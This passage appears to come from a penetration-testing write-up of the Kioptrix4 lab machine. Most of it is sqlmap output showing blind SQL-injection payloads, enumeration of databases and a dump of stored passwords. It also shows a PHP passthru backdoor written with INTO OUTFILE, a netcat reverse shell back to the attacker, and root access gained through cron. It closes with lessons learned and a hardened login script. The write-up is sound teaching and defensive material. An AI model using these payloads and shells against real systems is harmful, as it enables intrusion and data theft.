got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
6
[08:40:50] [INFO] retrieved: 'root'@'localhost'
[08:40:54] [INFO] retrieved: 'root'@'Kioptrix4'
[08:40:58] [INFO] retrieved: 'root'@'127.0.0.1'
[08:41:03] [INFO] retrieved: 'debian-sys-maint'@'localhost'
[08:41:09] [INFO] retrieved: ''@'localhost'
[08:41:12] [INFO] retrieved: ''@'Kioptrix4'
database management system users [6]:
[*] ''@'Kioptrix4'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'Kioptrix4'
[*] 'root'@'localhost'

[08:41:15] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:41:15] [WARNING] you haven't updated sqlmap for more than 113 days!!!

[*] ending @ 08:41:15 /2020-04-23/

kali@kali:~$

Next, we want to find out the status of the user we are currently running as (the --current-user option). If that user is the database administrator, that is of course an advantage (the --is-dba option). And of course we want to know the kind of database we are attacking (the --banner option).

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=a&Submit=Login' -p mypassword --batch -v 0 --fingerprint --banner --current-db --current-user --is-dba
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:03:28 /2020-04-23/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=admin' AND (SELECT 6095 FROM (SELECT(SLEEP(5)))CRdG)-- LUNZ&Submit=Login
---
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
               comment injection fingerprint: MySQL 5.0.51
banner: '5.0.51a-3ubuntu5.4'
current user: 'root@localhost'
current database: 'members'
current user is DBA: True

[*] ending @ 21:03:38 /2020-04-23/


The next piece of information is the names of the databases on the server (option --dbs):

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B --dbs  
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:36:36 /2020-04-23/

[08:36:36] [INFO] resuming back-end DBMS 'mysql' 
[08:36:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:36:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:36:36] [INFO] fetching database names
[08:36:36] [INFO] fetching number of databases
[08:36:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:36:36] [INFO] retrieved: 
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[08:36:40] [INFO] retrieved: information_schema
[08:36:44] [INFO] retrieved: members
[08:36:45] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql

[08:36:46] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:36:46] [WARNING] you haven't updated sqlmap for more than 113 days!!!

[*] ending @ 08:36:46 /2020-04-23/

kali@kali:~$ 

Clearly the database worth exploring is the one named members. The next step is to retrieve information about the tables inside that database (options -D and --tables).

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B -D members --tables  
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:46:27 /2020-04-23/

[08:46:27] [INFO] resuming back-end DBMS 'mysql' 
[08:46:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:46:27] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:46:27] [INFO] fetching tables for database: 'members'
[08:46:27] [INFO] fetching number of tables for database 'members'
[08:46:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:46:27] [INFO] retrieved: 
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
1
[08:46:32] [INFO] retrieved: members
Database: members
[1 table]
+---------+
| members |
+---------+

[08:46:33] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:46:33] [WARNING] you haven't updated sqlmap for more than 113 days!!!

[*] ending @ 08:46:33 /2020-04-23/

kali@kali:~$ 

The members database turns out to have only one table, also named members. Next we look at the number of columns in the members table (options -T and --columns).

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B -D members -T members --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:50:43 /2020-04-23/

[08:50:43] [INFO] resuming back-end DBMS 'mysql' 
[08:50:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:50:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:50:43] [INFO] fetching columns for table 'members' in database 'members'
[08:50:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:50:43] [INFO] retrieved: 
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
3
[08:50:46] [INFO] retrieved: id
[08:50:47] [INFO] retrieved: int(4)
[08:50:48] [INFO] retrieved: username
[08:50:50] [INFO] retrieved: varchar(65)
[08:50:52] [INFO] retrieved: password
[08:50:54] [INFO] retrieved: varchar(65)
Database: members
Table: members
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(4)      |
| password | varchar(65) |
| username | varchar(65) |
+----------+-------------+

[08:50:56] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:50:56] [WARNING] you haven't updated sqlmap for more than 113 days!!!

[*] ending @ 08:50:56 /2020-04-23/

kali@kali:~$ 

From this information we can conclude that the members table has three columns: id, username and password. We can now obtain the credentials stored on the Kioptrix4 server (options -C and --dump):

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=pass&Submit=Login' -p mypassword --technique=B -D members -T members -C username,password --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:52:25 /2020-04-23/

[08:52:25] [INFO] resuming back-end DBMS 'mysql' 
[08:52:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login
---
[08:52:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[08:52:25] [INFO] fetching entries of column(s) 'password, username' for table 'members' in database 'members'
[08:52:25] [INFO] fetching number of column(s) 'password, username' entries for table 'members' in database 'members'
[08:52:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:52:25] [INFO] retrieved: 
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
2
[08:52:28] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[08:52:31] [INFO] retrieved: robert
[08:52:33] [INFO] retrieved: MyNameIsJohn
[08:52:35] [INFO] retrieved: john
Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password              |
+----------+-----------------------+
| robert   | ADGAdsafdfwt4gadfga== |
| john     | MyNameIsJohn          |
+----------+-----------------------+

[08:52:36] [INFO] table 'members.members' dumped to CSV file '/home/kali/.sqlmap/output/192.168.216.151/dump/members/members.csv'
[08:52:36] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/192.168.216.151'
[08:52:36] [WARNING] you haven't updated sqlmap for more than 113 days!!!

[*] ending @ 08:52:36 /2020-04-23/

kali@kali:~$ 

We can also enter the database and run queries against the members database (option --sql-shell) to obtain the same secret information, namely the contents of the username and password columns of that table:

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=a&Submit=Login' -p mypassword --sql-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:17:03 /2020-04-23/

[21:17:04] [INFO] resuming back-end DBMS 'mysql' 
[21:17:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=admin' AND (SELECT 6095 FROM (SELECT(SLEEP(5)))CRdG)-- LUNZ&Submit=Login
---
[21:17:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[21:17:04] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> 
sql-shell> select * from members
[21:18:08] [INFO] fetching SQL SELECT statement query output: 'select * from members'
[21:18:08] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[21:18:08] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[21:18:08] [INFO] fetching current database
[21:18:08] [INFO] resumed: members
[21:18:08] [INFO] fetching columns for table 'members' in database 'members'
[21:18:08] [INFO] resumed: 3
[21:18:08] [INFO] resumed: id
[21:18:08] [INFO] resumed: username
[21:18:08] [INFO] resumed: password
[21:18:08] [INFO] the query with expanded column name(s) is: SELECT id, password, username FROM members
[21:18:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[21:18:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:18:08] [INFO] retrieved: 
got a 302 redirect to 'http://192.168.216.151:80/login_success.php?username=admin'. Do you want to follow? [Y/n] n
2
the SQL query provided can return 2 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
> a
[21:18:17] [INFO] retrieved: 1
[21:18:17] [INFO] retrieved: MyNameIsJohn
[21:18:20] [INFO] retrieved: john
[21:18:21] [INFO] retrieved: 2
[21:18:21] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[21:18:24] [INFO] retrieved: robert
select * from members [2]:
[*] 1, MyNameIsJohn, john
[*] 2, ADGAdsafdfwt4gadfga==, robert

sql-shell> 

Next, we gather information about the system using sqlmap's limited shell facility, the --os-shell option. We want to know which operating-system user account we are currently running as, and whether the netcat program is present on the server. The information gathered: we are currently running as the www-data account, and the netcat program is available on the server.

kali@kali:~$ sqlmap -u 'http://192.168.216.151/checklogin.php' --data='myusername=admin&mypassword=a&Submit=Login' -p mypassword --os-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:24:51 /2020-04-23/

[21:24:51] [INFO] resuming back-end DBMS 'mysql' 
[21:24:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-6144' OR 4194=4194#&Submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: myusername=admin&mypassword=admin' AND (SELECT 6095 FROM (SELECT(SLEEP(5)))CRdG)-- LUNZ&Submit=Login
---
[21:24:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[21:24:51] [INFO] going to use a web backdoor for command prompt
[21:24:51] [INFO] fingerprinting the back-end DBMS operating system
[21:24:51] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[21:24:54] [INFO] retrieved the web server document root: '/var/www'
[21:24:54] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[21:24:54] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[21:24:55] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.168.216.151:80/tmpuzyph.php
[21:24:55] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[21:24:55] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] Y
[21:25:03] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.168.216.151:80/tmpblpkr.php
[21:25:03] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> 
os-shell> whereis nc
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz'
os-shell> 
os-shell> 

With netcat available, we can reach the target through a limited shell. To do this we start netcat listening on port 443 (nc -lvnp 443) on the laptop, and run the netcat program on the Kioptrix4 server.

os-shell> 
os-shell> /bin/nc.traditional 192.168.216.154 443 -e /bin/sh
No output
Figure 22. Accessing a limited shell via netcat on the victim server

After obtaining the limited shell, the next step is to escalate privileges to root. For that we will create a backdoor in the web root (/var/www), but the problem is that we (the www-data account) currently have no privilege to write there. Remember, however, that sqlmap did have the privilege to create a file in the web root. So we should also be able to create a file by exploiting the vulnerable mypassword parameter.

So let us experiment with creating a file in the web root using the privilege sqlmap had. We use the mypassword parameter to issue the SQL command %27 or 1=1 INTO OUTFILE '/var/www/dump' -- -. This command creates a file containing the column dump that sqlmap produced in the previous step. Follow the sequence of steps in the figures below.

Figure 23. Executing the command that creates a file in the web root
Figure 24. A file named dump is successfully created in the web root directory
Figure 25. The dump file can be executed by the attacker

In this way we can create a simple backdoor in the web root. The backdoor file we create contains <?php passthru($_GET['cmd']); ?>. We then ASCII-hex encode that PHP command sequence before sending it through Burp Suite to the Kioptrix4 server. And, Alhamdulillah, a file named backdoor.php is created and works as expected. See the following sequence of figures.

To refine the backdoor, we also reviewed the source code of checklogin.php. The script works with three values: id, password, username. So that the command is executed only once, the attacker 'nulls' those three values with spaces. Next, "OR" is replaced with "AND" so that the condition is always true.

cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
        session_register("myusername");
        session_register("mypassword");
        header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

ob_end_flush();
?>

The following sequence of figures (Figures 26 to 28) shows how the backdoor was created on the Kioptrix4 server.

Figure 26. Using an SQL command through the vulnerable mypassword parameter to create the backdoor file
Figure 27. The SQL command sent through the mypassword parameter creates the backdoor file in the web root directory
Figure 28. The attacker can run operating-system commands through the backdoor without difficulty

Next we look through the processes running with root privileges; one of them is cron (see Figure 29). We will use this process to escalate our privileges from www-data to root.

Figure 29. The cron process running with root privileges is an opportunity for privilege escalation

The cron process will be used to execute netcat on the victim (Kioptrix4). We send the command using Burp Suite (Figure 30). On the attacker side we also open port 444 with netcat. Once the command has been sent, the cron job runs from /etc/cron.d (Figure 31).

Figure 30. Sending the command that makes cron execute netcat
Figure 31. After waiting one minute, cron executes netcat, which connects back to the attacker on port 444
Figure 32. The attacker succeeds in gaining root privileges on the Kioptrix4 server

After waiting one minute, cron executes netcat, which connects back to us on port 444 and thereby raises our privileges to root (Figure 32). The attacker has thus stolen the data in the database and taken over the Kioptrix4 server completely.

Lessons Learned

From this journey of hunting for vulnerabilities on the Kioptrix4 server, there are several lessons that Electronic System Operators should keep in mind.

First lesson: Electronic System Operators (PSE) should adopt information-security best practice throughout the software development life cycle, that is, a Secure Development Life Cycle. The vulnerability in the myusername and mypassword parameters is what led to the data breach.

Second lesson: another careless mistake concerns the MySQL database configuration, where the Database Administrator account has no password. This let the attacker walk straight into the database. Infrastructure hardening must be taken seriously and reviewed regularly, covering not only the operating system but also the database in use.
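A hardened replacement for checklogin.php that addresses both lessons, written here as an added example (it is not the Kioptrix4 script or the author's code): the query is parameterised with PDO prepared statements instead of string concatenation, passwords are verified against password_hash() output instead of being compared in clear text, and the script connects as a dedicated account (hypothetical name webapp, password taken from the environment) rather than as root with an empty password. Assumptions: PHP 7.2 or newer with the pdo_mysql extension, and that the members.password column now holds bcrypt hashes, whose 60 characters fit the existing varchar(65).

```php
<?php
// Added example: hardened checklogin.php, not the original Kioptrix4 script.
// Assumes PHP >= 7.2 with pdo_mysql, a dedicated DB account (hypothetical name
// 'webapp') that has only SELECT on members.members, no FILE privilege and a
// real password, and that members.password stores password_hash() output.
declare(strict_types=1);

session_start();

$host    = 'localhost';
$db_name = 'members';
$db_user = 'webapp';                        // not root: the web tier needs SELECT only
$db_pass = getenv('MEMBERS_DB_PASSWORD');   // set in the server environment, never ''

if ($db_pass === false || $db_pass === '') {
    error_log('MEMBERS_DB_PASSWORD is not set; refusing to connect with an empty password');
    http_response_code(500);
    exit('Service unavailable');
}

$myusername = $_POST['myusername'] ?? '';
$mypassword = $_POST['mypassword'] ?? '';

// Cheap sanity limits; they are not the injection defence, the prepared statement is.
if ($myusername === '' || $mypassword === '' || strlen($myusername) > 65) {
    http_response_code(400);
    exit('Wrong Username or Password');
}

try {
    $pdo = new PDO(
        "mysql:host=$host;dbname=$db_name;charset=utf8mb4",
        $db_user,
        $db_pass,
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
        ]
    );

    // The username travels as a bound parameter, so a payload such as
    // -6144' OR 4194=4194#  is compared as a literal string, never parsed as SQL.
    $stmt = $pdo->prepare('SELECT password FROM members WHERE username = :u LIMIT 1');
    $stmt->execute([':u' => $myusername]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    error_log('checklogin DB error: ' . $e->getMessage());   // details go to the log, not the client
    http_response_code(500);
    exit('Service unavailable');
}

// The submitted password is only ever compared against the stored bcrypt hash;
// the clear-text value is never written to the database, the session or the log.
$ok = ($row !== false) && password_verify($mypassword, $row['password']);

if ($ok) {
    session_regenerate_id(true);              // fresh session id on authentication
    $_SESSION['username'] = $myusername;      // session_register() is obsolete; never store the password
    header('Location: login_success.php');    // no username reflected into the URL
    exit;
}

// Failed attempts are logged for detection; the username is sanitised before it reaches the log.
$safe_user = preg_replace('/[^A-Za-z0-9._@-]/', '_', $myusername);
error_log("checklogin: failed login for '$safe_user' from {$_SERVER['REMOTE_ADDR']}");
http_response_code(401);
echo 'Wrong Username or Password';
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
```

On the MySQL side the same webapp account should be created without the FILE privilege and with secure_file_priv set, so that an INTO OUTFILE through the web tier can no longer write into /var/www as it did above.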

These two valuable lessons deserve close attention as preventive measures against cyber attacks that can lead to data leaks and data breaches.